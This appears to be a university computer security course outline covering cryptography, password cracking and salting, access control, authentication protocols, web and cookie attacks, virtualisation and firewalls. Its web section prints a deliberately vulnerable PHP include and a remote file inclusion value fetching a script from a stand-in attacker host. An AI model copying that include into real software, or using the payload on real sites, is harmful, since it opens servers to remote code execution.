1. Fundamentals

Features of Computer Security

There is no such thing as absolute computer security
Theory is not equal to practice

CIA Triangle

Confidentiality

Integrity

Availability

Security Incidents

1. Malware - The Morris Worm
2. Denial of Service (DoS) attack on GitHub
3. DDoS Attack on Amazon
4. Hacktivism
5. Megaupload Incident
6. Social Engineering
7. Physical Security
Analysing Security Incidents
  1. Who did it?
  2. Motivation - why might they be doing it?
  3. Attack vector
  4. Damage (which security aspect is breached)
  5. What should be done to prevent the attack or mitigate the damage?

Basic Terminologies

Asset
Vulnerability
Threat
| Threat | Security Aspect |
| --- | --- |
| Spoofing | Authentication |
| Tampering | Integrity |
| Repudiation | Non-repudiation |
| Information disclosure | Confidentiality |
| Denial of Service | Availability |
| Elevation of Privilege | Authorisation |
Attack
Risk
Countermeasure
Trust

Risk Analysis and Handling

Informal Risk Analysis
Qualitative Methods

Quantitative Methods

Strategies to Handle Risks
  1. Fix the vulnerabilities
  2. Risk acceptance
  3. Risk avoidance
  4. Risk transference
  5. Detection
  6. Reaction

2. Secret Key Encryption

Overview

Terminology

Plaintext

Ciphertext

Encryption / Decryption

Cipher

Cryptography

Types of Encryption

Secret Key Encryption

Public Key Encryption

Secret Key Cryptography

Overview

Technique 1 - Steganography

Overview
Why is it used?
Process:
How to hide data in an image
Example of LSB Insertion

Technique 2 - Code Words

Technique 3 - Change the Order of Letters

Technique 4 - Substitution

4a - Monoalphabetic Substitution Cipher

Frequency Analysis

4b - Polyalphabetic Substitution Cipher

Methods of Implementing Polyalphabetic Substitution Ciphers
4c - Non-Repeating, Different Substitutions

Principles of Good Encryption

1. Confusion
2. Diffusion
3. Hard to break even with MOST GENEROUS ASSUMPTIONS
4. Management of encryption scheme is feasible and cost-effective

Data Encryption Standard (DES)

Data Encryption Standard

Block vs Stream Cipher

Specification

The Feistel Approach Overview

Algorithm
  1. The plaintext block is split into two equal parts (L_0, R_0), each of 32 bits
  2. Run one side of the pair through a Feistel function that is fed a key K_0
  3. The output of this function, R_0K_0, is XORed with the other half L_0
  4. The output of this XOR is used as the input of the round function for the next round, while the initial R_0 is XORed with this 2nd round function output
  5. This continues for a total of 16 rounds; the final blocks are the ciphertext
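
The steps above as a runnable sketch, added here as an illustration and not taken from the original notes: a 16-round Feistel network on a 64-bit block. The round function and key schedule are constructed stand-ins (HMAC-SHA256 and SHA-256), not the DES round function or PC-1/PC-2; the point shown is that decryption reuses the same network with the subkeys in reverse order, whatever the round function is.

```python
import hashlib
import hmac

ROUNDS = 16
HALF_BITS = 32
MASK = (1 << HALF_BITS) - 1


def round_function(right: int, subkey: bytes) -> int:
    """Toy F(R, K). Assumption: a stand-in, NOT the DES round function.

    F never has to be inverted, so any keyed function works here.
    """
    digest = hmac.new(subkey, right.to_bytes(4, "big"), hashlib.sha256).digest()
    return int.from_bytes(digest[:4], "big")


def subkeys(key: bytes) -> list:
    """Derive 16 round keys (constructed schedule, not DES PC-1/PC-2)."""
    return [hashlib.sha256(key + bytes([i])).digest() for i in range(ROUNDS)]


def feistel(block: int, round_keys: list) -> int:
    left, right = block >> HALF_BITS, block & MASK
    for k in round_keys:
        # L_{i+1} = R_i ; R_{i+1} = L_i XOR F(R_i, K_i)
        left, right = right, left ^ round_function(right, k)
    # Swap the halves at the end so the same code can run in reverse.
    return (right << HALF_BITS) | left


def encrypt(block: int, key: bytes) -> int:
    return feistel(block, subkeys(key))


def decrypt(block: int, key: bytes) -> int:
    # Same network, subkeys applied in reverse order.
    return feistel(block, subkeys(key)[::-1])


if __name__ == "__main__":
    plaintext = 0x0123456789ABCDEF          # constructed sample block
    ciphertext = encrypt(plaintext, b"constructed-key")
    print(f"{ciphertext:016x}", decrypt(ciphertext, b"constructed-key") == plaintext)
```
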
Characteristic of Feistel Cipher

Subkey Generation

Algorithm
Permuted Choice 1
  1. Drops the 8th bit of each of the eight 8-bit blocks, as they are the parity bits
  2. Permute the remaining 56 bits
Permuted Choice 2

Round Function (Feistel Function)

There are 4 operations in this function
  1. Expansion

  2. Key Combination

  3. Substitution

  4. Permutation

Summary of DES

Advanced Encryption Standard (AES)

Advanced Encryption Standard

Overview
Algorithm

Matrix Operations

1. Substitution - SubBytes

2. Permutation - ShiftRows

3. Mixing - MixColumns

4. Round Key - AddRoundKey

Security

AES is a lot more secure than DES

Common Secret Key Encryption Algorithms

3. Public Key Encryption

Public Key Encryption

Motivation
Public Key Encryption

Modular Arithmetic

Congruence
Properties of Modular Arithmetic
  1. (A + B) \bmod n \equiv ((A \bmod n) + B) \bmod n
  2. (A + B) \bmod n \equiv ((A \bmod n) + (B \bmod n)) \bmod n
  3. (A \times B) \bmod n \equiv ((A \bmod n) \times B) \bmod n
  4. (A \times B) \bmod n \equiv ((A \bmod n) \times (B \bmod n)) \bmod n
  5. x^{A \times B} \bmod n \equiv (x^A \bmod n)^B \bmod n
  6. (x^A \bmod n)^B \bmod n \equiv (x^B \bmod n)^A \bmod n
One Way Functions
Primitive Roots

RSA Encryption Algorithm

Overview
Generating the Public Key
Message Encryption
Generating the Private Key
Finding d
Ciphertext Decryption
Example

Security of RSA

Public vs Secret Key encryption

DES is between 1000 and 10000 times faster than RSA (encryption & decryption)

| Secret | Public |
| --- | --- |
| Uses XOR, substitution, permutation - fast | Uses a one-way function - slower |
| Key is secret, attacker knows less information and hence requires shorter key for same level of security | Only relies on the length of the public key to prevent the crack with brute force |
| Faster to perform operations on a shorter key | The longer the key, the slower the operation |
| Key distribution is complicated | Key distribution is easy |

4. Digital Signature & Certificates

Digital Signatures

Integrity, Authentication, Non-repudiation

Symmetry of Public Key Encryption
Terminology
Methodology

Digital Signatures

Motivation
Methodology
  1. Calculate the hash of the message (aka. digest)
  2. Encrypt the hash using the private key. This is the digital signature
Verification
Encryption vs Digital Signature
| Encryption Scheme | Digital Signature |
| --- | --- |
| Maintains confidentiality | Provides integrity check, authentication and non-repudiation |
| Can recover plaintext | Cannot recover plaintext |

Message Authentication Code (MAC)

Overview
Motivation

Digital Certificates

Digital Certificates

Overview
Format
O=University of Warwick, 
OU=Department of Computer Science, 
CN=Ligang He 
Authentication through certificates
  1. A asks for B’s certificate, and B sends it over
  2. A uses the CA’s public key to verify B’s certificate
  3. If B’s certificate is genuine, B’s public key contained in B’s certificate is genuine

Strong Authentication with Certificate

Authentication Chain

Web of Trust

Overview
Determining Validity
Trust Requirements
Distance Requirements

Certificate Authority vs Web of Trust

Certificate Authority
Web of Trust
| Certificate Authority | Web of Trust |
| --- | --- |
| More convenient for end users as CAs are assumed to be trustworthy | Less convenient for end users as they continually assess the reliability of certificates |
| If one CA certificate is compromised, the attacker can impersonate any site on the internet as all CAs have the authority to sign any certificate | Integrity of WoT depends on how well maintained it is by its users |
| Usually one authentication chain for any certificate, so every chain has a single point of failure | Usually has multiple signature chains for one certificate, so a particular certificate is more trustworthy |

Cryptographic Hashing

Overview

Hash Function: SHA-256

  1. The message is padded to make the message length a multiple of 512
  2. Message divided into blocks of 512 bits
  3. 64 words are generated from each block, each word is 32 bits
  4. 8 H variables are initialised
  5. Each message block is processed one at a time, and the H variables are added
  6. The hash of the message is the bitwise-concatenation of all the H variables.

Hashing in Practice

5. Password Authentication

Authentication

Passwords

Overview
Attacks related to Passwords
The problem with passwords
People’s tendency in setting passwords
User Overload
Possible Solutions

Password Cracking

Cracking Speed
| Password | Combinations (C) |
| --- | --- |
| 26 characters - length 4 | 26^4 = 456976 |
| 52 characters - length 4 | 52^4 = 7.3 \times 10^6 |
| 94 characters - length 8 | 94^8 = 6.1 \times 10^{15} |

| Hash | Using | Speed |
| --- | --- | --- |
| MD5 | Good PC | 10^7 guess/s |
| SHA256 | Good PC | 10^6 g/s |
| MD5 | PC + Graphics Card | 10^{10} g/s |
| SHA 256 | PC + Graphics Card | 10^9 g/s |
Entropy
Human-Generated Passwords

Storing Passwords

Other Authentication Methods

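| Biometric | False Positive | False Negative |
| --- | --- | --- |
| Face | 1% | 10% |
| Fingerprint | 1% | 0.1% |
| Hand Geometry | 2% | 0.1% |
| Iris | 0.94% | 0.99% |
| Retina | 0.0001% | 0.2% |
| Keystrokes | 7% | 0.1% |
| Voices | 2% | 10% |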

6. Secure Email

Terminology

How email is delivered

  1. The user begins by using the email client, which connects to the SMTP server and sends the server the email address of the recipient, the name of the sender and the body of the message
  2. If the domains of the recipient and sender are identical, the SMTP server hands the message to the POP3 or IMAP server for that particular domain
  3. Otherwise, SMTP communicates with the Domain Name Server (DNS) for the IP address of the SMTP server in the other domain.
  4. The SMTP server at the sender’s side sends the email message to the SMTP server at the recipient’s end, which then hands the message to the POP3 server for the recipient’s domain

General Security Issues in Emails

Overview
  1. Email is free - encourages spam, DoS attacks
  2. Email can carry payloads (viruses)
  3. Email is easy to spoof (if there is no authentication)
Email Servers

Solutions to Problems

Spam
Payloads
Spoofing
Interception

Diagram of PGP Encryption Scheme

7. Password Cracking

Methods

There are a few methods of cracking a password hash:

Brute Force and Dictionary Attacks

Brute Force Attacks

Dictionary Attacks

Lookup Tables

Reverse Lookup Tables

Problem with Dictionary Attack and Lookup Tables

What Reverse Lookup Tables do

Uses a technique called a hash chain

Reduction Functions

The only requirement for the reduction function is to return a value in P; other than that, it can be anything.

Constructing the Hash Chain

p_1 \to h_1 \to p_2 \to h_2 \to p_3 \to h_3 \to p_4

Cracking Passwords

Example - Cracking Hashes

Starting Password    Ending Password
hello                e#,OO
waltz                <[X|j
close                SM-Jb
proxy                rnbq^
which                |Us5,

False Alarms

This is the main problem with RLT - hash chain collisions that we call false alarms

\text{Chain 1:} \hspace{1em} p_1 \to h_1 \to p_2 \to h_2 \to p_3 \to h_3 \to p_4

\text{Chain 2:} \hspace{1em} p'_1 \to h'_1 \to p'_2 \to h'_2 \to p_2 \to h_2 \to p_3

Rainbow Table

h (R_k \to) p'_1 (R_1 \to) ... (R_2 \to) ... (R_{k-1} \to) ...

Defence

Password Salting

Login Verification

Defending against Table Attacks

In order for the lookup table attack to succeed, an attacker needs to precompute the tables.

H(p + s_1), H(p + s_2), ..., H(p + s_n)

When the salt is large, e.g. 48 bits, the required storage space will be too big for the attack to be worthwhile.
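
Salting and login verification side by side with the unsalted case, as an added example that is not part of the original notes. The password list is constructed, and PBKDF2-HMAC-SHA256 is used as H here (an assumption; the notes only write H(p + s)).

```python
import hashlib
import hmac
import os

COMMON = ["123456", "password", "qwerty", "letmein"]  # constructed sample list

# A precomputed lookup table: hash -> password, built once and reused.
LOOKUP = {hashlib.sha256(p.encode()).hexdigest(): p for p in COMMON}


def store_unsalted(password: str) -> str:
    """Weak: H(p). Equal passwords give equal, precomputable hashes."""
    return hashlib.sha256(password.encode()).hexdigest()


def store_salted(password: str, salt: bytes = b"") -> tuple:
    """H(p + s): a random per-user salt is stored next to the hash."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt, digest


def verify_login(attempt: str, salt: bytes, stored: bytes) -> bool:
    """Re-hash the attempt with the stored salt, compare in constant time."""
    _, candidate = store_salted(attempt, salt)
    return hmac.compare_digest(candidate, stored)


def table_hit(stored_hex: str):
    """Return the password if the stored hash is in the precomputed table."""
    return LOOKUP.get(stored_hex)


if __name__ == "__main__":
    print("unsalted in table:", table_hit(store_unsalted("letmein")))
    salt_a, hash_a = store_salted("letmein")
    salt_b, hash_b = store_salted("letmein")
    print("salted in table:", table_hit(hash_a.hex()))
    print("same password, same hash:", hash_a == hash_b)
    print("login ok:", verify_login("letmein", salt_a, hash_a))
```
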

Storing Passwords in Linux

When a user is created, their info is stored in the /etc/passwd file and their hash + salt is stored in the /etc/shadow file. Only the user can read passwd and only root can read shadow.

Password File

Shadow File

$6$JVGtK2Il$/s.5q4M1WN/ekw2rM26OHId9TPELOcPMmHG.E7zCzSbalzVPgPPGUIB7f7/2mTfj/Lg3RgoKhAkcsBDkJGAN.1:18554:0:99999:7:::

Unix Protection Rules

8. Access Control

Access control specifies what subject has what permission to access which object and enforces the permissions

Terminologies:

General procedure of access control

Principles of Access Control

  1. Principle of Least Privilege
  2. Principle of Fail-safe Defaults

Discretionary Access Control (DAC)

Controls are set by the owners

Specifying the Permissions

Storing the Permissions

Access Matrix
Access Control List (ACL)
Capability List

DAC Implementation in Operating Systems

Linux
Operating Systems that use ACL
Operating Systems that use Capability Lists

Mandatory Access Control (MAC)

An “across the board” policy that is enforced by the system. Often achieved with multi-level security

Terminology

Security Labels

Examples

Lattice Structure

Access Rules

No read up, and no write down

TLDR

Why do we need to form a lattice?

Flow of Information

Implementation of MAC in Linux

9. Security & Authentication over Networks

A->B: M1
B->A: M2

Authentication at a Distance

Replay Attack

A->B: [A]_Alice
B->A: B
Solution 1 - Session Token
A->B : A
B->A : R
A->B : [R]_Alice
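
The flawed exchange and the session-token fix above, simulated as an added example (not part of the original notes). Assumption: `[x]_Alice` is modelled with HMAC under a constructed demo key because the Python standard library has no public-key signatures; in the real protocol Bob would verify with Alice's public key.

```python
import hashlib
import hmac
import secrets

KEY = b"constructed-demo-key"  # stand-in for Alice's signing key


def sign(message: bytes) -> bytes:
    """[message]_Alice, modelled with HMAC (assumption, not a real signature)."""
    return hmac.new(KEY, message, hashlib.sha256).digest()


class Bob:
    def __init__(self):
        self.pending = set()  # challenges issued and not yet answered

    def accept_static(self, name: bytes, proof: bytes) -> bool:
        """Flawed: A->B: [A]_Alice. The same proof stays valid forever."""
        return hmac.compare_digest(proof, sign(name))

    def challenge(self) -> bytes:
        """B->A: R, a fresh random value for this session only."""
        r = secrets.token_bytes(16)
        self.pending.add(r)
        return r

    def accept_response(self, r: bytes, proof: bytes) -> bool:
        """A->B: [R]_Alice. R must be outstanding and is consumed on use."""
        if r not in self.pending:
            return False
        self.pending.discard(r)
        return hmac.compare_digest(proof, sign(r))


def replay_demo() -> dict:
    bob = Bob()
    captured_static = sign(b"Alice")      # message recorded off the wire once
    r1 = bob.challenge()
    captured_response = sign(r1)          # Alice's genuine answer, also recorded
    legit = bob.accept_response(r1, captured_response)
    r2 = bob.challenge()                  # a later session gets a new R
    return {
        "static_replay": bob.accept_static(b"Alice", captured_static),
        "legit_login": legit,
        "same_R_replay": bob.accept_response(r1, captured_response),
        "new_session_replay": bob.accept_response(r2, captured_response),
    }
```
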
Solution 2 - Timestamping

Mutual Authentication

A->B : I'm Alice, R_A
B->A : R_B, [R_A]_Bob
A->B : [R_B]_Alice
Using Digital Signature
A->B : "I'm Alice"
B->A : R
A->B : [R]_Alice
Using Public Key Encryption:
A->B : "I'm Alice"
B->A : {R}_KPAlice
A -> B : R

Man in the Middle Attack (Relay Attack)

Solution

Digital Signature

A->B : A
B->A : R
A->B : [R, E]_A

Encryption - this is also known as the Needham-Schroeder Authentication Protocol (public key variant)

A->B : A
B->A : {B, R}_KPA
A->B : R

Diffie-Hellman-Merkle (DHM) Key Exchange Protocol

10. Web Server Security Issues

Background

Interaction between Client and Web Server

HTTP Request

GET /docs/index.html HTTP/1.1
Host: www.nowhere123.com
Accept: image/gif, image/jpeg, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
{blank line}

HTTP Request Methods

How HTTP Server Processes Requests

Listening
Processing

PHP

Dynamic File Loading
<?php include $_GET['page'] . ".html"; ?>

Security Issues

Remote File Inclusion (RFI) Vulnerability

include http://ev.il/badscript.php?.html

Forms

Call OS commands in PHP

Path Exploits

Robot Exclusion Protocol

User-agent: * # apply to all robots
Disallow: /local/secure.html

User-agent: Googlebot # apply only to Googlebot
Disallow: /private/

11. Security with Cookies

Overview of Cookies

Web Service is stateless

What are Cookies

Setting Cookies

HTTPS Protocol

TLS / SSL

  1. Client sends an initial message to the server to agree on key, encryption method and hash function.
  2. Client generates digital signature or MAC, encrypts message + DS/MAC and sends them to the server.
  3. Server decrypts them and verifies the integrity

Accessing Cookies

JavaScript

PHP

Security of Cookies, Session

Session

Algorithm

  1. When client visits the same page or subpage, it sends the http request with the session id in the cookie
  2. When the server receives the request, it looks up the session id in the session data structure. If the session id exists, the client is authenticated
  3. (and 4) Server runs code to obtain data related to the client
  4. Server creates the webpage based on the data obtained
  5. Server composes and sends the http response message

Cookies-Related Security Attacks

Network Eavesdropping and Cookie Hijacking

Third Party Cookies

XSS (Cross-Site Scripting)

Phishing False Sub-Domain

Cross-Site Request Forgery (CSRF)

12. Security with Virtualisation

Virtualisation

Terminologies

Architecture

The OS sits between the hardware and its applications and manages the interaction between application and hardware resources. It is the lowest level software in a machine.

Embedded

Non-Embedded

Abstraction of Physical Resources

Life Cycles of VMs

Impact of Virtualisation on Security

1. Isolated

2. Transient

Advantages

Physical servers are often always on, while VMs can be started very quickly and remotely

Disadvantages

When a virus hits a conventional network of physical machines, admins often do the following:

3. State Restoring

Advantages

The virtual disk for a VM is stored as a file on the hypervisor. This allows the hypervisor to record changes to the contents of the virtual disk

Disadvantages - Protection
Disadvantages - Security Patches
Disadvantages - Vulnerability
Disadvantages - Data Lifetime

A fundamental principle for building secure systems is minimising the amount of time that sensitive data remains in a system

4. Low Privilege

In a physical computer, the OS is the software with the highest privilege in the computer

Advantages

5. Mobile

Disadvantages

VMs are not physical; everything about a VM is virtualised as files, which makes theft of data easier

6. Easy to Create

In a traditional network of physical machines, all machines have the same configurations. When there are security vulnerabilities, the same security measure can be applied to all machines

Disadvantages

7. Lack of Identity

Disadvantages

In a traditional environment, a machine can be identified by its MAC address or Ethernet port number. This is used as a mechanism of non-repudiation - the system has the mechanism to check who did something

Other Security Issues

Hypervisor Intrusion

If the hypervisor is compromised, the attacker can access all the VMs

Security due to Inter-VM communication

“VM-to-VM” attacks means that attackers use one VM to access or control other VMs on the same hypervisor

Denial of Service

An improperly configured hypervisor can allow a single VM to consume all resources, starving other running VMs

13. Security with Firewalls

Network Structure Basics

Firewalls

Network Structure

Switch vs Router

OSI 7 Layer Model

| Layer | Data Unit | Information Added |
| --- | --- | --- |
| Application (7) | Data | Application-specific data (e.g. HTTP, SSH) |
| Presentation (6) | Data | Data formatting (e.g. convert to binary), encryption (e.g. TLS) |
| Session (5) | Data | Session ID, sync info (SYN, SYN-ACK, ACK) |
| Transport (4) | Segment | Source/destination ports, sequence numbers |
| Network (3) | Packet | Source/destination IP addresses |
| Data Link (2) | Frame | MAC Addresses |
| Physical (1) | Bits | Convert bits to electrical signals |

Firewall Traffic Filtering Methods

Packet Filtering

Stateful Inspection

Proxy Service

Application-Level Filters

Host-Based Application Firewall